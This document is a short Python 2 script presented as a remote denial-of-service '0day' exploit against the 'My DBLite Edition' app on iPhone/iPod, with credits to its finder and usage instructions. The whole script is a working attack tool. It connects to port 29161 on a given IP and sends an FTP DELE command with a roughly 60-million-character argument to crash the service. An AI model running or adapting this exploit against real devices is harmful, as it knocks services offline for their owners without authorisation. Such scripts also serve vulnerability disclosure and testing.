#!/usr/bin/python
#
# Apple Iphone/Ipod - My DBLite Edition #Remote 0day DOS exploit
# Found by: Jason Bowes - admin @ blue-#dogz.com
# App Homepage: www.xenugo.co
# Price: Free
# Download: From the app store (use your #itunes account)
# Tested on: Iphone 3GS - firmware 3.1.2
# What's up to slicc1
# Advisory: ()
print "[+] Apple Iphone/Ipod - My DB lite edition Remote DOS exploit"
import ftplib
from ftplib import FTP
import sys
import socket
def Usage():
    print ("Usage:  ./mydblite.py <serv_ip>\n")
    print ("Example:./mydblite.py 192.168.1.3\n")
if len(sys.argv) <> 2:
        Usage()
        sys.exit(1)
else:
    hostname = sys.argv[1]
    delete = "$A$A$A" * 10000000
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 29161))
        print "[+] Connecting to the target.."
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] Sending payload..boom..boom..pow"
    sock.send("DELE %s\r\n" %delete)
print "[+] Server should now be DoS'd!"
sys.exit(0);